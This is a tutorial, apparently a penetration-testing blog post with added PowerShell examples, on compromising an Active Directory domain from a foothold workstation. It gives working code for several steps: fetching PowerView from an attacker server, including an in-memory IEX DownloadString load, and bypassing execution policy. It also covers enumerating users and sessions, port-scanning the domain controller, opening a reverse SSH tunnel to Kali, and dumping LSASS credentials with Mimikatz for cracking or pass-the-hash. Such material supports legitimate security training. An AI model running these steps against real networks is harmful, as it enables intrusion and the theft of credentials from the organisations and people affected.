Introduction
Welcome back to my series on Active Directory penetration testing! In this session, I’m going to show you how to take a compromised Windows client that’s part of a domain and start dumping password hashes. Let’s get right into it.
Getting Started: From Shell to PowerShell
I’m starting from the assumption that I’ve already gained a basic shell on a Windows machine within the target network. The first thing I always do is jump from the standard command line into PowerShell. It’s an incredibly powerful tool and absolutely essential for anyone serious about Active Directory testing.
Once I’m in PowerShell, my next job is to get my toolkit onto the compromised system. I use a simple PowerShell command to download my files. My go-to collection of scripts is PowerSploit, which is a goldmine for penetration testers.
Reconnaissance: Mapping Out the Domain
With PowerSploit on the machine, I can start my reconnaissance. I'll navigate to the Recon folder within the PowerSploit directory, which is packed with scripts for domain enumeration.
Before I can use any of these scripts, I need to import them. It's a simple command: Import-Module followed by the path to the script. The Get-Net* functions I use below all live in PowerView.ps1 in that folder, so that is the file to import. If PowerShell refuses to load it, the execution policy is the usual culprit; it can be bypassed for the current process without admin rights.
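Here is how the download-and-import step looks in practice, as an added PowerShell example (not the original post's commands): the URL, IP address and file paths are placeholders, and it assumes a web server on the Kali box serving PowerSploit's Recon folder.

```powershell
# Added example, not from the original post. Fetches PowerView.ps1 from an
# attacker-controlled web server and loads it. The URL, IP and paths are assumptions.

# Lift the execution-policy restriction for this process only: no registry change,
# no admin rights needed. Without it, importing a downloaded .ps1 fails.
Set-ExecutionPolicy Bypass -Scope Process -Force

$src  = 'http://10.10.14.5/PowerView.ps1'      # assumption: Kali serving PowerSploit/Recon
$dest = Join-Path $env:TEMP 'PowerView.ps1'

# Option A: write to disk, then import. Leaves a file behind for AV and the blue team
# to find, but the import is a plain Import-Module and survives a new session.
Invoke-WebRequest -Uri $src -OutFile $dest -UseBasicParsing
Unblock-File -Path $dest      # drop the "downloaded from the internet" zone mark
Import-Module $dest -Force

# Option B: load straight into memory without touching disk.
# AMSI still scans the script text, so a stock PowerView may be flagged either way.
# IEX (New-Object Net.WebClient).DownloadString($src)

# Sanity check: the PowerView functions used in the enumeration workflow should now resolve.
Get-Command Get-NetDomain, Get-NetUser, Get-NetGroup, Get-NetGroupMember,
            Get-NetComputer, Get-NetLoggedon |
    Select-Object Name, CommandType
```

Option A is the one the text describes; Option B is the in-memory variant most people use once they know the script loads cleanly.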
Here’s my typical enumeration workflow:
- Find the Domain: I start by getting the current domain name using Get-NetDomain. This gives me the forest name, the domain controllers, and the domain name itself. I always make sure to note this information down.
- List the Users: Next, I use Get-NetUser to get a list of all the user accounts in the domain. This command is great because it also shows me which groups each user belongs to (the memberof attribute). This is how I can spot high-value targets like administrators.
- List the Groups: To get a bird's-eye view of the group structure, I use Get-NetGroup.
- Check Group Members: If I want to see who's in a specific group, I use Get-NetGroupMember. For example, I can quickly check who's in the "IT" or "HR" groups. Nested groups are easy to miss here, so I check membership recursively.
- See Who's Logged In: This is a crucial step. Knowing who is currently logged into a machine helps me focus my efforts. I use Get-NetLoggedOn to see who's logged into the machine I'm on. If I want to check a different computer, I'll first get a list of all computers in the domain with Get-NetComputer and then use the ComputerName parameter. Querying a remote machine this way only works if my current account is a local administrator on it, so expect plenty of access-denied errors across the domain.
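The workflow above as one PowerView session, added here as an example and not the original author's script. It assumes PowerView.ps1 is already imported and the shell runs as a domain user; the "IT" and "HR" group names and the output directory are assumptions. It also handles the fact that older PowerView builds (the ones with the Get-Net* names used here) return plain hostnames from Get-NetComputer and Get-NetGroup while newer builds return objects.

```powershell
# Added example, not the original author's script. Assumes PowerView.ps1 is imported
# and the shell runs as a domain user. 'IT', 'HR' and $out are assumptions.

$out = Join-Path $env:TEMP 'recon'
New-Item -ItemType Directory -Path $out -Force | Out-Null

# Older PowerView builds return plain strings from Get-NetComputer and Get-NetGroup,
# newer ones return objects; normalise both to a name.
function Get-NameOf {
    param($Obj, [string]$Prop)
    if ($Obj -is [string]) { $Obj } else { $Obj.$Prop }
}

# 1. Domain: name, forest and the domain controllers (note these down).
$domain = Get-NetDomain
$domain | Select-Object Name, Forest, DomainControllers | Format-List

# 2. Users, with group membership (memberof holds distinguished names). Flag the
#    accounts sitting in the groups that matter most.
$users = Get-NetUser
$users | Select-Object samaccountname, description, memberof |
    Export-Csv -Path (Join-Path $out 'users.csv') -NoTypeInformation
$adminGroups = 'CN=(Domain Admins|Enterprise Admins|Administrators|Schema Admins),'
$highValue = $users | Where-Object { $_.memberof -match $adminGroups }
'High-value users:'
$highValue | ForEach-Object { $_.samaccountname }

# 3. Groups: the overall structure, saved for later.
Get-NetGroup | ForEach-Object { Get-NameOf $_ 'samaccountname' } | Sort-Object |
    Set-Content -Path (Join-Path $out 'groups.txt')

# 4. Members of specific groups, recursively so nested groups are expanded.
#    -GroupName is the older PowerView parameter; newer builds use -Identity.
foreach ($g in 'Domain Admins', 'IT', 'HR') {
    "== $g =="
    Get-NetGroupMember -GroupName $g -Recurse | Select-Object MemberDomain, MemberName
}

# 5. Logged-on users: this host first, then every computer in the domain.
#    Get-NetLoggedon calls NetWkstaUserEnum, which only answers a remote query when
#    we are a local admin on that box, so errors are silenced and the loop continues.
'== Logged on locally =='
Get-NetLoggedon | Format-Table -AutoSize

$computers = Get-NetComputer | ForEach-Object { Get-NameOf $_ 'dnshostname' }
foreach ($c in $computers) {
    $sessions = Get-NetLoggedon -ComputerName $c -ErrorAction SilentlyContinue
    if ($sessions) {
        "== $c =="
        $sessions | Format-Table -AutoSize
    }
}
```

The users.csv and groups.txt files are what I come back to later: a Domain Admin who shows up in a Get-NetLoggedon result on a box I can already reach is the target for the hash-dumping step.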
Moving Laterally: Port Scanning and Tunneling
Once I have a good map of the network, I start thinking about lateral movement. The first step is to find out which services on the domain controller I can actually reach, so I scan it for open ports.
I use the Invoke-Portscan script from PowerSploit's Recon folder for this. I give it the hostname of the domain controller and the ports I care about, and it shows me which of them are open. Besides the services you'd find on any Windows host, like Remote Desktop, NetBIOS or an HTTP listener, a domain controller exposes Kerberos (88), LDAP (389/636), SMB (445) and DNS (53), and those are the ones the rest of the attack will go through.
After I've finished my enumeration, I like to set up a reverse SSH tunnel from the compromised machine back to my Kali Linux machine, forwarding the domain controller's open ports. This lets me point Kali-side tools at the domain controller as if it were on localhost, which opens up a whole new world of tools and possibilities. It needs an SSH client on the Windows host (recent Windows 10 and 11 builds ship one) and an SSH server listening on Kali.
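Both steps of this section in one added PowerShell example (not from the original post): a connect scan of the ports a domain controller normally serves, with PowerSploit's Invoke-Portscan shown as the alternative, followed by the reverse SSH tunnel command that exposes each open port on the Kali side. The DC hostname, the Kali address and account, and the presence of ssh.exe on the Windows host are assumptions.

```powershell
# Added example, not from the original post. Scans the domain controller for the
# ports a DC normally exposes, then builds a reverse SSH tunnel back to Kali.
# $dc, $kali and the availability of ssh.exe on this host are assumptions.

$dc = 'dc01.corp.local'

# Ports a domain controller serves and what each gives an attacker. String keys on
# purpose: indexing an ordered hashtable with an int selects by position, not by key.
$dcPorts = [ordered]@{
    '53'   = 'DNS (zone enumeration)'
    '88'   = 'Kerberos (roasting, ticket replay)'
    '135'  = 'MSRPC endpoint mapper (DCOM/WMI)'
    '139'  = 'NetBIOS session'
    '389'  = 'LDAP (object enumeration)'
    '445'  = 'SMB (shares, SAMR, remote exec, pass-the-hash)'
    '464'  = 'Kerberos password change'
    '636'  = 'LDAPS'
    '3268' = 'Global Catalog'
    '3389' = 'RDP'
    '5985' = 'WinRM'
}

# Option A: PowerSploit's Invoke-Portscan, as in the text. -Open prints only open ports.
# Invoke-Portscan -Hosts $dc -Ports ($dcPorts.Keys -join ',') -Open

# Option B: plain .NET TCP connect scan with a timeout, for hosts where loading
# PowerSploit is not an option. Emits one object per port so the results can be reused.
function Test-DcPorts {
    param([string]$Target, [int[]]$Ports, [int]$TimeoutMs = 1000)
    foreach ($p in $Ports) {
        $client = New-Object System.Net.Sockets.TcpClient
        $open = $false
        try {
            $async = $client.BeginConnect($Target, $p, $null, $null)
            # WaitOne returns false on timeout; Connected is false on refusal.
            if ($async.AsyncWaitHandle.WaitOne($TimeoutMs, $false) -and $client.Connected) {
                $client.EndConnect($async)
                $open = $true
            }
        } catch { }
        finally { $client.Close() }
        [pscustomobject]@{ Port = $p; Open = $open; Service = $dcPorts["$p"] }
    }
}

$results = Test-DcPorts -Target $dc -Ports ([int[]]$dcPorts.Keys)
$results | Format-Table -AutoSize
$openPorts = $results | Where-Object Open | Select-Object -ExpandProperty Port

# Reverse tunnel: each open DC port becomes 127.0.0.1:(10000 + port) on Kali, e.g.
# 10445 for SMB and 10389 for LDAP. Offsetting by 10000 keeps every bind above 1024,
# so sshd on Kali does not need root to open them. Kali must be running sshd.
$kali = 'kali@10.10.14.5'    # assumption
$forwards = $openPorts | ForEach-Object { "-R $(10000 + $_):${dc}:${_}" }
$sshCmd = "ssh -N $($forwards -join ' ') $kali"
Write-Host $sshCmd
# Start-Process ssh -ArgumentList "-N $($forwards -join ' ') $kali"   # prompts for the Kali credential
```

Once the tunnel is up, anything on Kali that takes a host and port (LDAP, SMB and Kerberos tooling alike) is pointed at 127.0.0.1 and the offset port instead of the domain controller directly.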
Dumping Hashes with Mimikatz
Now for the moment we’ve all been waiting for: dumping password hashes. For this, I use the legendary tool Mimikatz.
I navigate to the Mimikatz directory and run the executable from an elevated (local administrator) PowerShell. Before I do anything else, I need the right privilege: typing privilege::debug enables SeDebugPrivilege on my token, which is what lets Mimikatz open the LSASS process. If that command errors out, the shell isn't elevated, and the next step will fail.
With debug privilege enabled, I can dump the credentials of every logon session cached in LSASS on the workstation with the command sekurlsa::logonpasswords. Bear in mind that Mimikatz is flagged by nearly every antivirus product, and that LSA Protection or Credential Guard on the target will block this step or leave it with nothing to read.
The output from this command is pure gold. For each session it gives me the username, the domain and the NTLM and SHA1 hashes of the password, plus a cleartext password where an older provider like WDigest still caches one. I can then take the NTLM hashes offline and crack them with a tool like John the Ripper (NTLM is fast to crack), and even an uncracked NTLM hash is usable as-is for pass-the-hash.
Mimikatz can also pull Kerberos tickets out of memory and reuse them (pass-the-ticket), but that's a topic for another day!
I’ll be covering more advanced Active Directory penetration testing techniques in my future videos, so make sure you stay tuned!